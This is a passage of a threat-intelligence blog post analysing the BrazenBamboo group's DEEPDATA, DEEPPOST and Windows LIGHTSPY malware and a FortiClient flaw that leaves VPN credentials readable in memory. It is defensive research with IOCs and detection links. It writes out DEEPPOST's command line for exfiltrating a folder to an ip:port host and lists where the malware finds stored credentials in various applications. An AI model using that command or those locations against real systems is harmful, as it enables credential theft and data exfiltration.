srcset="https://www.volexity.com/wp-content/uploads/2024/11/Volexity-Blog-BrazenBamboo-Weaponizes-FortiClient-Vulnerability-to-Steal-VPN-Credentials-via-DEEPDATA.png 2061w, https://www.volexity.com/wp-content/uploads/2024/11/Volexity-Blog-BrazenBamboo-Weaponizes-FortiClient-Vulnerability-to-Steal-VPN-Credentials-via-DEEPDATA-300x157.png 300w, https://www.volexity.com/wp-content/uploads/2024/11/Volexity-Blog-BrazenBamboo-Weaponizes-FortiClient-Vulnerability-to-Steal-VPN-Credentials-via-DEEPDATA-1024x536.png 1024w, https://www.volexity.com/wp-content/uploads/2024/11/Volexity-Blog-BrazenBamboo-Weaponizes-FortiClient-Vulnerability-to-Steal-VPN-Credentials-via-DEEPDATA-768x402.png 768w, https://www.volexity.com/wp-content/uploads/2024/11/Volexity-Blog-BrazenBamboo-Weaponizes-FortiClient-Vulnerability-to-Steal-VPN-Credentials-via-DEEPDATA-1536x803.png 1536w, https://www.volexity.com/wp-content/uploads/2024/11/Volexity-Blog-BrazenBamboo-Weaponizes-FortiClient-Vulnerability-to-Steal-VPN-Credentials-via-DEEPDATA-2048x1071.png 2048w" sizes="(max-width: 2061px) 100vw, 2061px" /></p> <p><em>[Update: At the time of publication, this vulnerability had not been addressed by Fortinet. On December 18, 2024, <a href="https://fortiguard.fortinet.com/psirt/FG-IR-23-278">Fortinet published a public acknowledgement</a> of the issue, affected versions, as well as patching &amp; workaround advice.]</em></p> <hr /> <h5><span style="color: #4e9dd6;">KEY TAKEAWAYS</span></h5> <ul style="font-weight: 400;"> <li><em>Volexity discovered and reported a vulnerability in Fortinet's Windows VPN client, FortiClient, where user credentials remain in process memory after a user authenticates to the VPN.</em></li> <li><em>This vulnerability was abused by BrazenBamboo in their DEEPDATA malware.</em></li> <li><em>BrazenBamboo is the threat actor behind development of the LIGHTSPY malware family.</em></li> <li><em>LIGHTSPY variants have been discovered for all major operating systems, including iOS, and Volexity has recently discovered a new Windows variant.</em></li> </ul> <p style="font-weight: 400;">In July 2024, Volexity identified exploitation of a zero-day credential disclosure vulnerability in Fortinet’s Windows VPN client that allowed credentials to be stolen from the memory of the client’s process. This vulnerability was discovered while analyzing a recent sample of the DEEPDATA malware family. DEEPDATA is a modular post-exploitation tool for the Windows operating system that is used to gather a wide range of information from target devices. Analysis of the sample revealed a plugin that was designed to extract credentials from FortiClient VPN client process memory. On July 18, 2024, Volexity notified Fortinet about this vulnerability. Since the time of Volexity's initial discovery and reporting to Fortinet, <a href="https://www.threatfabric.com/blogs/lightspy-implant-for-ios">ThreatFabric</a> and <a href="https://blogs.blackberry.com/en/2024/11/lightspy-apt41-deploys-advanced-deepdata-framework-in-targeted-southern-asia-espionage-campaign">Blackberry</a> have each published reports that cover different aspects of some of the content discussed in this post. <strong> </strong></p> <p style="font-weight: 400;">Volexity attributes the development of DEEPDATA to a Chinese state-affiliated threat actor that it tracks as BrazenBamboo. Volexity has observed links between BrazenBamboo and three distinct malware families: LIGHTSPY, DEEPDATA, and DEEPPOST. Volexity tracks BrazenBamboo as the <em>developer</em> of these malware families and not necessarily one of the operators using them (there may be many). Volexity has also identified a new Windows variant of LIGHTSPY that was not previously documented at the time of writing.</p> <p style="font-weight: 400;">This blog post details the use and functionality of DEEPDATA, with a key look at zero-day exploitation of the FortiClient vulnerability, and how DEEPPOST is used to exfiltrate files from compromised systems. This blog post also looks at the recently discovered Windows variant of LIGHTSPY, including notable changes, and the associated wider command-and-control (C2) infrastructure of the BrazenBamboo threat actor.</p> <h2>Malware Analysis</h2> <p style="font-weight: 400;">Volexity’s analysis began with discovery of an archive file named <code>deepdata.zip</code> (SHA256:<code>666a4c569d435d0e6bf9fa4d337d1bf014952b42cc6d20e797db6c9df92dd724</code>) that is tied to BrazenBamboo. This archive contains several files that are part of two Windows malware families, which Volexity refers to as DEEPDATA and DEEPPOST. Each malware family is analyzed in the sections that follow. Volexity also separately obtained and analyzed a new Windows variant of LIGHTSPY that is described further below.</p> <h3>DEEPDATA</h3> <p style="font-weight: 400;">As previously mentioned, DEEPDATA is a modular post-exploitation tool for Windows that facilitates collection of sensitive information from a compromised system. This tool must be run from the command line of a system by an attacker. The DEEPDATA malware elements include the following:</p> <table class="table table--style-2" style="font-weight: 400;"> <thead> <tr> <td width="83"><strong>Filename</strong></td> <td width="319"><strong>Description</strong></td> </tr> </thead> <tbody> <tr> <td width="83"><code>data.dll</code></td> <td width="319">DEEPDATA Loader</td> </tr> <tr> <td width="83"><code>mod.dat</code></td> <td width="319">DEEPDATA Virtual File System (VFS)</td> </tr> <tr> <td width="83"><code>readme.txt</code></td> <td width="319">File containing DEEPDATA Execution Options</td> </tr> </tbody> </table> <p style="font-weight: 400;">The <code>readme.txt</code> file describes how to execute the DEEPDATA loader, along with available parameters and a decryption key.</p> <p><img decoding="async" class="aligncenter size-full wp-image-3353" src="https://www.volexity.com/wp-content/uploads/2024/11/image001.png" alt="" width="1254" height="540" srcset="https://www.volexity.com/wp-content/uploads/2024/11/image001.png 1254w, https://www.volexity.com/wp-content/uploads/2024/11/image001-300x129.png 300w, https://www.volexity.com/wp-content/uploads/2024/11/image001-1024x441.png 1024w, https://www.volexity.com/wp-content/uploads/2024/11/image001-768x331.png 768w" sizes="(max-width: 1254px) 100vw, 1254px" /></p> <p style="font-weight: 400;">The <code>key</code> parameter is used by the DEEPDATA loader file to decrypt and load the “core” components of the DEEPDATA malware family stored in the local VFS file (<code>mod.dat</code>). These components will always execute and are not dependent on additional parameters passed on the command line.</p> <p style="font-weight: 400;">The core components of DEEPDATA include the following files:</p> <table class="table table--style-2" style="font-weight: 400;"> <thead> <tr> <td width="174"><strong> Filename</strong></td> <td width="450"><strong>Purpose</strong></td> </tr> </thead> <tbody> <tr> <td width="174"><code>frame.dll</code></td> <td width="450">Shellcode – core orchestrator for plugin execution</td> </tr> <tr> <td width="174"><code>ffmpeg.dll</code></td> <td width="450">Contains <a href="https://www.zdnet.com/article/malware-authors-are-still-abusing-the-heavens-gate-technique/">Heaven’s Gate</a> code to load 32-bit code in 64-bit processes</td> </tr> <tr> <td width="174"><code>vertdll.dll</code></td> <td width="450">Collects event logs</td> </tr> <tr> <td width="174"><code>iumdll.dll</code></td> <td width="450">Library used to collect locally stored WeChat data</td> </tr> <tr> <td width="174"><code>ucrtbase_enclave.dll</code></td> <td width="450">Library used to collect locally stored Feishu data</td> </tr> <tr> <td width="174"><code>d3dcompiler_47.dll</code></td> <td width="450">Checks the running instant messaging apps (Line, Feishu, WeChat)</td> </tr> </tbody> </table> <p style="font-weight: 400;">The architecture of DEEPDATA’s loader, core, and plugins is shown below.</p> <p><img decoding="async" class="aligncenter size-full wp-image-3354" src="https://www.volexity.com/wp-content/uploads/2024/11/image002.png" alt="" width="1260" height="879" srcset="https://www.volexity.com/wp-content/uploads/2024/11/image002.png 1260w, https://www.volexity.com/wp-content/uploads/2024/11/image002-300x209.png 300w, https://www.volexity.com/wp-content/uploads/2024/11/image002-1024x714.png 1024w, https://www.volexity.com/wp-content/uploads/2024/11/image002-768x536.png 768w" sizes="(max-width: 1260px) 100vw, 1260px" /></p> <p style="font-weight: 400;">The core components are always included in the VFS files, but Volexity was only able to find <code>frame.dll</code> stored on the C2 servers. While DEEPDATA plugins are stored in the VFS files, they are also stored as their own dedicated files on the C2 servers; they can be loaded from either location. The DEEPDATA plugins in the VFS are decrypted using the same key as the other components in the VFS.</p> <p style="font-weight: 400;">The overall plugin logic is the same as that seen in LIGHTSPY malware samples, with the following exported functions used by the core orchestrator:</p> <ul> <li><code>ExecuteCommand</code></li> <li><code>GetPluginCommandID</code></li> <li><code>GetPluginName</code></li> <li><code>GetPluginVersion</code></li> </ul> <p style="font-weight: 400;">DEEPDATA maintains configuration data within the VFS file with the following files stored in an encrypted state:</p> <table class="table table--style-2" style="font-weight: 400;"> <thead> <tr> <td width="100"><strong>Filename</strong></td> <td width="337"><strong>Description</strong></td> </tr> </thead> <tbody> <tr> <td width="100"><code>config.json</code></td> <td width="337">Contains DEEPDATA configuration information</td> </tr> <tr> <td width="100"><code>manifest.json</code></td> <td width="337">Contains DEEPDATA plugin information</td> </tr> <tr> <td width="100"><code>manifest1.json</code></td> <td width="337">Contains DEEPDATA plugin information</td> </tr> <tr> <td width="100"><code>date.ini</code></td> <td width="337">Purpose unclear, contains a single byte of <code>0x30</code></td> </tr> </tbody> </table> <p style="font-weight: 400;">The <code>manifest.json</code> file is also stored on the C2 server but in an unencrypted state.</p> <p style="font-weight: 400;">Volexity identified a total of 12 unique plugins for DEEPDATA, which are summarized below:</p> <table class="table table--style-2" style="font-weight: 400; width: 644px;"> <thead> <tr> <td style="width: 144px;" width="123"><strong>Plugin Name</strong></td> <td style="width: 500px;" width="500"><strong>Plugin Capabilities</strong></td> </tr> </thead> <tbody> <tr> <td style="width: 144px;" width="123"><code>AccountInfo</code></td> <td style="width: 500px;" width="500">Steal credentials from 18 different sources on the compromised device.</td> </tr> <tr> <td style="width: 144px;" width="123"><code>AppData</code></td> <td style="width: 500px;" width="500">Collect data from WeChat, WhatsApp and Signal on the compromised device.</td> </tr> <tr> <td style="width: 144px;" width="123"><code>Audio</code></td> <td style="width: 500px;" width="500">Record audio on compromised devices.</td> </tr> <tr> <td style="width: 144px;" width="123"><code>ChatIndexedDb</code></td> <td style="width: 500px;" width="500">Steal databases from WhatsApp and Zalo chat clients.</td> </tr> <tr> <td style="width: 144px;" width="123"><code><strong>FortiClient</strong></code></td> <td style="width: 500px;" width="500"><strong>Extract credentials and server information from process memory of FortiClient VPN processes. </strong></td> </tr> <tr> <td style="width: 144px;" width="123"><code>Outlook</code></td> <td style="width: 500px;" width="500">Collect contacts and emails from local Microsoft Outlook instances.</td> </tr> <tr> <td style="width: 144px;" width="123"><code>SocialSoft</code></td> <td style="width: 500px;" width="500">Steal data from WeChat, Line, QQ, DingDing, Skype, Telegram, and Feishu applications.</td> </tr> <tr> <td style="width: 144px;" width="123"><code>SoftwareList</code></td> <td style="width: 500px;" width="500">List installed software, folders, and files recursively from a base location.</td> </tr> <tr> <td style="width: 144px;" width="123"><code>SystemInfo</code></td> <td style="width: 500px;" width="500">Gather basic enumeration information from the compromised device.</td> </tr> <tr> <td style="width: 144px;" width="123"><code>TdMonitor</code></td> <td style="width: 500px;" width="500">Hook Telegram to retrieve messages from the application.</td> </tr> <tr> <td style="width: 144px;" width="123"><code>WebBrowser</code></td> <td style="width: 500px;" width="500">Collect history, cookies, and passwords from Firefox, Chrome, Opera, and Edge web browsers.</td> </tr> <tr> <td style="width: 144px;" width="123"><code>WifiList</code></td> <td style="width: 500px;" width="500">Collect details of stored WiFi keys and nearby hotspots.</td> </tr> </tbody> </table> <p style="font-weight: 400;">As shown above, DEEPDATA supports a wide range of functionality to extract data from victims’ systems. The observed functionality of several plugins is commonly seen and includes items typically stolen from victim systems. However, Volexity noted the <code><strong>FortiClient</strong></code> plugin was uncommon and investigated it further. Volexity found the FortiClient plugin was included through a library with the filename <code>msenvico.dll</code>. This plugin was found to exploit a zero-day vulnerability in the Fortinet VPN client on Windows that allows it to extract the credentials for the user from memory of the client’s process.</p> <p style="font-weight: 400;">As seen in the code snippet below, the FortiClient plugin looks for the username, password, remote gateway, and port from two different JSON objects in memory.</p> <p><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-3355" src="https://www.volexity.com/wp-content/uploads/2024/11/image003.png" alt="" width="638" height="378" srcset="https://www.volexity.com/wp-content/uploads/2024/11/image003.png 638w, https://www.volexity.com/wp-content/uploads/2024/11/image003-300x178.png 300w" sizes="auto, (max-width: 638px) 100vw, 638px" /></p> <p style="font-weight: 400;">This is similar to a previously documented vulnerability <a href="https://www.linkedin.com/pulse/extracting-clear-text-passwords-from-running-hacking-korznikov/">identified in 2016</a>, where credentials could be discovered in memory based on hardcoded offsets in memory. The previous vulnerability does not have an associated CVE.</p> <p style="font-weight: 400;">Volexity verified the presence of these JSON objects in memory and confirmed this approach works against the latest version available at the time of discovery (v7.4.0). Notably, the same approach does not work against older versions of the Fortinet VPN client. Volexity reported this vulnerability to Fortinet on July 18, 2024, and Fortinet acknowledged the issue on July 24, 2024. At the time of writing, this issue remains unresolved and Volexity is not aware of an assigned CVE number.</p> <h3>DEEPPOST</h3> <p style="font-weight: 400;">DEEPPOST is a post-exploitation data exfiltration tool used to send files to a remote system. The following sample was analyzed:</p> <table class="table--style-1" style="font-weight: 400;"> <tbody> <tr> <td width="312"><strong>Name(s)</strong></td> <td width="312">localupload.exe</td> </tr> <tr> <td width="312"><strong>Size</strong></td> <td width="312">618.5KB (633344 Bytes)</td> </tr> <tr> <td width="312"><strong>File Type</strong></td> <td width="312">application/x-dosexec</td> </tr> <tr> <td width="312"><strong>MD5</strong></td> <td width="312">533297a7084039bf6bda702b752e6b82</td> </tr> <tr> <td width="312"><strong>SHA1</strong></td> <td width="312">20214e2e93b1bb37108aa1b8666f6406fabca8a0</td> </tr> <tr> <td width="312"><strong>SHA256</strong></td> <td width="312">f4e72145e761bcc8226353bb121eb8e549dc0000c6535bfa627795351037dc8e</td> </tr> <tr> <td width="312"><strong>VirusTotal First Submitted</strong></td> <td width="312">N/A</td> </tr> </tbody> </table> <p style="font-weight: 400;">DEEPPOST supports the following syntax:</p> <blockquote> <p style="font-weight: 400;"><code>localupload.exe  c:\data_to_exfiltrate\  ip:port</code></p> </blockquote> <p style="font-weight: 400;">Exfiltration is performed via HTTPS to a hardcoded API endpoint, <code>/api/third/file/upload/</code>, usually on port 29983 (although this is not a default and would be set by the operator at the command line).</p> <h3>LIGHTSPY Background</h3> <p style="font-weight: 400;">The LIGHTSPY malware family was publicly documented in 2020, when <a href="https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/">Kaspersky</a> and <a href="https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf">Trend Micro</a> reported on a mobile malware campaign targeting individuals in Hong Kong. More recently, <a href="https://www.lookout.com/threat-intelligence/article/wyrmspy-dragonegg-surveillanceware-apt41">Lookout</a> and <a href="https://www.threatfabric.com/blogs/lightspy-mapt-mobile-payment-system-attack#attribution">ThreatFabric</a> discussed LIGHTSPY mobile malware campaigns. Lookout linked malware they call “DragonEgg” (LIGHTSPY) to another malware family, WyrmSpy, and to a Department of Justice <a href="https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer">indictment</a> regarding APT41. The macOS variant of LIGHTSPY was discussed by <a href="https://www.huntress.com/blog/lightspy-malware-variant-targeting-macos">Huntress</a> and <a href="https://www.threatfabric.com/blogs/lightspy-implant-for-macos#infrastructure">ThreatFabric</a>, with the latter also detailing some associated C2 management infrastructure.</p> <p style="font-weight: 400;">To summarize what is known and reported, LIGHTSPY is a multi-platform malware family with documented variants for Android, iOS, and macOS. <a href="https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/">Kaspersky</a> and <a href="https://www.threatfabric.com/blogs/lightspy-implant-for-macos">ThreatFabric</a> previously identified references to the existence of variants for Windows, Linux, and Router, but they did not document further analysis.</p> <p style="font-weight: 400;">Volexity was able to retrieve copies of LIGHTSPY written specifically for Windows. In contrast to other LIGHTSPY variants, the Windows variant was not encoded with the same incremental XOR algorithm. Rather, it was encoded with a more complex algorithm that also included padding at the beginning of the files. The architecture for the Windows variant of LIGHTSPY is different from other documented OS variants. This variant is deployed by an installer that deploys a library to execute shellcode in memory. The shellcode downloads and decodes the orchestrator component from the C2 server (<code>pic32.png</code> for x86 and <code>pic64.png</code> for x64 architecture).</p> <p style="font-weight: 400;">The loader used for these samples is <code>BH_A006</code>, which has <a href="https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/#id3-6">historically been used</a> to load other malware families. It is not clear whether this is a commercially available loader or evidence of shared development capabilities across different operators. A summary of the execution chain is below.</p> <p><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-3356" src="https://www.volexity.com/wp-content/uploads/2024/11/image004.png" alt="" width="1570" height="790" srcset="https://www.volexity.com/wp-content/uploads/2024/11/image004.png 1570w, https://www.volexity.com/wp-content/uploads/2024/11/image004-300x151.png 300w, https://www.volexity.com/wp-content/uploads/2024/11/image004-1024x515.png 1024w, https://www.volexity.com/wp-content/uploads/2024/11/image004-768x386.png 768w, https://www.volexity.com/wp-content/uploads/2024/11/image004-1536x773.png 1536w" sizes="auto, (max-width: 1570px) 100vw, 1570px" /></p> <p style="font-weight: 400;">On first execution, the LIGHTSPY <code>orchestrator</code> sends a 102-byte UDP packet starting with <code>0x1A5F2E1</code> followed by random bytes. LIGHTSPY expects the server to reply with a packet starting with <code>0x2A5F2E1</code>. If the server replies properly, an<code> account.bin</code> file is created that contains the server answer, which has the same format as a MAC address and is internally named "<code>broadband account mac</code>". If the file already exists, the DNS request is not performed. This UDP handshake is unique to the Windows variant.</p> <p style="font-weight: 400;">Like its counterparts, the Windows variant of LIGHTSPY uses WebSocket and HTTPS for communication, with WebSocket used for most JSON-based communications and HTTPS for exfiltration. An interesting observation to note: The user-agent for the HTTPS request is copy-pasted from the macOS variant, as shown below.</p> <p><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-3357" src="https://www.volexity.com/wp-content/uploads/2024/11/image005.png" alt="" width="2146" height="448" srcset="https://www.volexity.com/wp-content/uploads/2024/11/image005.png 2146w, https://www.volexity.com/wp-content/uploads/2024/11/image005-300x63.png 300w, https://www.volexity.com/wp-content/uploads/2024/11/image005-1024x214.png 1024w, https://www.volexity.com/wp-content/uploads/2024/11/image005-768x160.png 768w, https://www.volexity.com/wp-content/uploads/2024/11/image005-1536x321.png 1536w, https://www.volexity.com/wp-content/uploads/2024/11/image005-2048x428.png 2048w" sizes="auto, (max-width: 2146px) 100vw, 2146px" /></p> <p style="font-weight: 400;">The <code>orchestrator</code> expects all plugins to export the following functions:</p> <ul> <li><code>ExecuteCommand</code></li> <li><code>GetPluginCommandID</code></li> <li><code>GetPluginName</code></li> <li><code>Initial</code></li> <li><code>StopCommand</code></li> <li><code>Time</code></li> <li><code>UnInitial</code></li> </ul> <p style="font-weight: 400;">Unlike the macOS variant, most of the code in the Windows variant is executed in memory. The LIGHTSPY Windows plugins are summarized below:</p> <table class="table table--style-2" style="font-weight: 400;"> <thead> <tr> <td width="113"><strong>Plugin Name</strong></td> <td width="510"><strong>Purpose</strong></td> </tr> </thead> <tbody> <tr> <td width="113"><code>Audio</code></td> <td width="510">Records audio using the <code>libavcodev</code> library</td> </tr> <tr> <td width="113"><code>Browser</code></td> <td width="510">Collects cookies, history, stored credentials, and bookmarks from web-browsers</td> </tr> <tr> <td width="113"><code>FileManager</code></td> <td width="510">Provides CRUD operations for files on the device and convenience methods for uploading data to the C2 server</td> </tr> <tr> <td width="113"><code>Keyboard</code></td> <td width="510">Records keystrokes</td> </tr> <tr> <td width="113"><code>Screen</code></td> <td width="510">Records the user’s screen using the <code>libavcodev</code> library</td> </tr> <tr> <td width="113"><code>Software</code></td> <td width="510">Collects information on installed software and manages services</td> </tr> <tr> <td width="113"><code>Terminal</code></td> <td width="510">Provides a remote shell for the threat actor to execute commands</td> </tr> <tr> <td width="113"><code>Video</code></td> <td width="510">Records webcam and audio from the infected device</td> </tr> </tbody> </table> <h2>Infrastructure</h2> <h3>DEEPDATA C2 Infrastructure</h3> <p style="font-weight: 400;">At the time of analysis, there were six C2 servers serving DEEPDATA payloads and hosting DEEPDATA-related management applications. These servers were also configured for DEEPDATA usage:</p> <table class="table table--style-2" style="font-weight: 400;"> <thead> <tr> <td width="75"><strong>Port</strong></td> <td width="314"><strong>Function</strong></td> <td width="234"><strong>Technology</strong></td> </tr> </thead> <tbody> <tr> <td width="75">28443</td> <td width="314">DEEPDATA operator application, HTML title “spack-info”</td> <td width="234">Nginx 1.14.0, Django Rest Framework</td> </tr> <tr> <td width="75">28992</td> <td width="314">Hosts the various DEEPDATA plugins &amp; config files</td> <td width="234">Nginx 1.14.0</td> </tr> <tr> <td width="75">28993</td> <td width="314">Communication channel for DEEPDATA implants/plugins</td> <td width="234">Nginx 1.14.0, Django Rest Framework</td> </tr> </tbody> </table> <p style="font-weight: 400;">Three of the six hosts were also running an API endpoint on port 48993 that, based on the API endpoints, appeared to be used for managing an instance of the web-crawling framework <a href="https://github.com/scrapy/scrapy">Scrapy</a>.</p> <p style="font-weight: 400;">Volexity also identified four “keyboard-walk”-style strings used by BrazenBamboo in the URL patterns for DEEPDATA infrastructure:</p> <ul> <li><code>qweasdzxc</code></li> <li><code>qazxswedcvfr</code></li> <li><code>asdgdsfdsfasd</code></li> <li><code>asdgdsfee</code></li> </ul> <p style="font-weight: 400;">One DEEPDATA C2 server had an API endpoint serving a developer change log for the malware. This log was written in Chinese, and the most recent entry was from October 2023; the oldest entry was April 2022. A translated version of the change log is provided in the <a href="#Appendix2">Appendix</a>.</p> <h3>LIGHTSPY C2 Infrastructure</h3> <p style="font-weight: 400;">At the time of analysis, there were a total of 26 active hosts serving LIGHTSPY payloads. They were always hosted on a URL path starting with the string <code>963852741</code>. These servers host various artifacts used in both the development &amp; deployment of LIGHTSPY, including manifest files indicating the current version available for download. When analyzing these manifest files, the last-modified times indicated that LIGHTSPY’s development began in 2019 and continued to be updated into 2024.</p> <p style="font-weight: 400;">The LIGHTSPY C2 servers are less uniform than DEEPDATA, but generally the plugins are hosted on ports 52202, 43202, or 54602. The C2 management infrastructure is hosted on nearby ports (generally 43201, 53501, or 59501) but uses different starting strings for the URL paths:</p> <ul> <li><code>963852iuy</code></li> <li><code>963852poi</code></li> </ul> <h3>Other BrazenBamboo C2 Infrastructure</h3> <p style="font-weight: 400;">BrazenBamboo infrastructure also hosts other applications not directly linked to the LIGHTSPY and DEEPDATA malware families. Many are built using the <a href="https://vuejs.org/">Vue</a> framework and use a <a href="https://router.vuejs.org/guide/advanced/lazy-loading.html">lazy loading</a> method implemented by Vue to decrease loading times to import JavaScript and CSS components. ThreatFabric’s <a href="https://www.threatfabric.com/blogs/lightspy-implant-for-macos">report</a> covered some of the interesting aspects of these components. This functionality also reveals evidence of additional unreported capabilities of the BrazenBamboo threat actor, including the following:</p> <ul> <li>A “Reptile” email theft platform</li> <li>A proxy generation platform</li> <li>A Big Data styled Analysis platform for stolen data, conveniently named 联网大数据综合分析平台 (English translation: Internet Big Data Comprehensive Analysis Platform)</li> <li>Several configurable delivery methods, which are shown below. Another version of this panel listed the vulnerability attack as the “0day attack” type.<img loading="lazy" decoding="async" class="aligncenter size-full wp-image-3358" src="https://www.volexity.com/wp-content/uploads/2024/11/image006.png" alt="" width="544" height="211" srcset="https://www.volexity.com/wp-content/uploads/2024/11/image006.png 544w, https://www.volexity.com/wp-content/uploads/2024/11/image006-300x116.png 300w" sizes="auto, (max-width: 544px) 100vw, 544px" /></li> </ul> <p style="font-weight: 400;">There is substantial wording in these applications that would align with a domestic surveillance intent for these capabilities. The user management aspects of the panel also contain wording that suggests this tooling is used by multiple third parties, such as requirements to input an organization when registering a user and the extensive documentation on how to use the platform.</p> <h2>Attribution &amp; Overlaps</h2> <h3>DEEPDATA and LIGHTSPY</h3> <p style="font-weight: 400;">The DEEPDATA malware family has several overlaps with the LIGHTSPY malware family:</p> <ul> <li>Plugin file and export function names</li> <li>Shared program database (PDB) development paths</li> <li>Shared JSON formatting for C2 communications</li> <li>Similar formats for JSON configuration files</li> <li>Similar plugin code execution flow:</li> </ul> <p><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-3359" src="https://www.volexity.com/wp-content/uploads/2024/11/image007.png" alt="" width="1392" height="556" srcset="https://www.volexity.com/wp-content/uploads/2024/11/image007.png 1392w, https://www.volexity.com/wp-content/uploads/2024/11/image007-300x120.png 300w, https://www.volexity.com/wp-content/uploads/2024/11/image007-1024x409.png 1024w, https://www.volexity.com/wp-content/uploads/2024/11/image007-768x307.png 768w" sizes="auto, (max-width: 1392px) 100vw, 1392px" /></p> <p style="font-weight: 400; text-align: center;"><em>LIGHTSPY (left) and DEEPDATA (right) <code>Audio.dll</code> Plugins</em></p> <p style="font-weight: 400;">The DEEPDATA and LIGHTSPY C2 infrastructure also has several overlaps:</p> <ul> <li>Historically shared the same IP address for hosting plugins</li> <li>Shared TLS certificates</li> <li>Shared URL patterns for operator panels</li> <li>Shared operator applications across C2 servers</li> </ul> <p style="font-weight: 400;">Volexity assesses with a high degree of confidence that these two malware families are developed by related entities and are suitable to be clustered under the same threat actor alias.</p> <h3>Public Reporting Overlaps</h3> <p style="font-weight: 400;">Several C2 IP addresses mentioned in public reporting have overlaps with DEEPDATA infrastructure, including the following:</p> <table class="table table--style-2" style="font-weight: 400; width: 654px;" width="654"> <thead> <tr> <td width="115"><strong>IP Address</strong></td> <td width="275"><strong>Mention in Public Reports </strong></td> <td width="264"><strong>Overlaps</strong></td> </tr> </thead> <tbody> <tr> <td width="115"><code>103.27.109[.]217</code></td> <td width="275">Huntress’s &amp; ThreatFabric’s macOS reports</td> <td width="264">Shares a self-signed TLS certificate with all currently active DEEPDATA C2 servers</td> </tr> <tr> <td width="115"><code>103.27.108[.]207</code></td> <td width="275">ThreatFabric’s Mobile report</td> <td width="264">Shares a self-signed TLS certificate with all currently active DEEPDATA C2 servers</td> </tr> <tr> <td width="115"><code>121.201.109[.]98</code></td> <td width="275">Lookout’s DragonEgg report</td> <td width="264">Based on VirusTotal Intelligence URL submissions, Volexity assesses with moderate confidence this server historically hosted DEEPDATA plugins</td> </tr> </tbody> </table> <h2>Audit Exposed Credentials with Volexity Volcano</h2> <p style="font-weight: 400;"><a href="https://www.volexity.com/products-overview/volcano/">Volexity Volcano</a> is a powerful memory analysis framework that can help investigate systems compromised by this threat actor’s malware. It can also be used to proactively audit Windows, Linux, and macOS systems to identify other applications that expose credentials in clear text. This is as easy as searching memory for strings known to exist near the credentials, such as “remote_gateway” in this case. Another technique is to search for known password values after authenticating to a Fortinet VPN connection via FortiClient, and more importantly, after an extended period of time, to check for passwords after logging out. Volcano attributes memory pages back to their owning process or kernel module, which helps associate activity back to applications that may not handle passwords as securely as possible.</p> <h2>Conclusion</h2> <p style="font-weight: 400;">Volexity’s analysis provides evidence that BrazenBamboo is a well-resourced threat actor who maintains multi-platform capabilities with operational longevity. The breadth and maturity of their capabilities indicates both a capable development function and operational requirements driving development output. This evidence, combined with the architectural decisions BrazenBamboo has made within their malware and related infrastructure, leads Volexity to assess with medium confidence that BrazenBamboo is a private enterprise that produces capabilities for governmental operators concerned with domestic targets.</p> <p style="font-weight: 400;">Some key elements supporting Volexity’s assessment are below:</p> <ul> <li>The language used in the C2 operator infrastructure references domestic surveillance and law enforcement contexts.</li> <li>There is a lack of operational security in the C2 infrastructure, which is typical of foreign intelligence operations.</li> <li>The architecture decisions of DEEPDATA and LIGHTSPY are more typical of standard software development practices than malware families.</li> <li>There is continued development and operation of LIGHTSPY despite a notable number of public reporting on its capabilities and indicators.</li> <li>In recent years, this style of operation has become well publicized for China-based threat actors, with notable examples including <a href="https://www.fbi.gov/wanted/cyber/apt-41-group">Chengdu 404</a> and <a href="https://harfanglab.io/insidethelab/isoon-leak-analysis/">iSOON</a>.</li> </ul> <p style="font-weight: 400;">The timestamps associated with the latest payloads for DEEPDATA and LIGHTSPY are evidence that both malware families continue to be developed. The backend infrastructure maintained by BrazenBamboo to analyze the data retrieved by their malware families offers insight into the scale of this collection, driving a requirement for custom analyst software to analyze this data at scale.</p> <p>To detect the malware used in this specific attack, Volexity recommends the following:</p> <ul> <li>Use the rules provided <a href="https://github.com/volexity/threat-intel/blob/main/2024/2024-11-15%20BrazenBamboo/rules.yar">here</a> to detect related activity.</li> <li>Block the IOCs provided <a href="https://github.com/volexity/threat-intel/blob/main/2024/2024-11-15%20BrazenBamboo/iocs.csv">here</a>.</li> </ul> <blockquote><p>Volexity's Threat Intelligence research, such as the content from this blog, is published to customers via its <a href="https://www.volexity.com/services-overview/threat-intelligence/">Threat Intelligence Service</a>. The details published in this post were shared with customers in a series of posts between February 2024 and August 2024. Volexity <a href="https://www.volexity.com/services-overview/network-security-monitoring/">Network Security Monitoring</a> customers are also automatically covered through signatures and deployed detections from the threats and IOCs described in this post.</p> <hr /> <p>If you are interested in learning more about Volexity products and services, please do not hesitate to <a href="https://www.volexity.com/company/contact/">contact us</a>.</p></blockquote> <h2>Appendix</h2> <h3>DEEPDATA AccountInfo Plugin Targets</h3> <table class="table table--style-2" style="font-weight: 400;"> <thead> <tr> <td width="144"><strong>Targeted Service</strong></td> <td width="480"><strong>Credential Theft Technique</strong></td> </tr> </thead> <tbody> <tr> <td width="144">Baidu Net Disk</td> <td width="480">In memory</td> </tr> <tr> <td width="144">OneDrive</td> <td width="480">By hooking web requests in the legitimate process</td> </tr> <tr> <td width="144">KeePass</td> <td width="480">In memory, by using the open-source tool <a href="https://github.com/denandz/KeeFarce">KeeFarce</a></td> </tr> <tr> <td width="144">QQ</td> <td width="480">On disk</td> </tr> <tr> <td width="144">Windows</td> <td width="480">By using <a href="https://github.com/gentilkiwi/mimikatz">Mimikatz</a></td> </tr> <tr> <td width="144">Mail Master</td> <td width="480">On disk, by querying an internal <code>mail.db</code> file</td> </tr> <tr> <td width="144">Fox Mail</td> <td width="480">On disk, by reading the <code>Account.rec0</code> file</td> </tr> <tr> <td width="144">SquirrelSQL</td> <td width="480">On disk, by reading the <code>SQLAliases23.xml</code> file</td> </tr> <tr> <td width="144">DBVisualizer</td> <td width="480">On disk, by reading the <code>dbvis.xml</code> file</td> </tr> <tr> <td width="144">OpenSSH</td> <td width="480">On disk, by reading the config and the ssh key files</td> </tr> <tr> <td width="144">Mobaxterm</td> <td width="480">In registry</td> </tr> <tr> <td width="144">WinSCP</td> <td width="480">In registry</td> </tr> 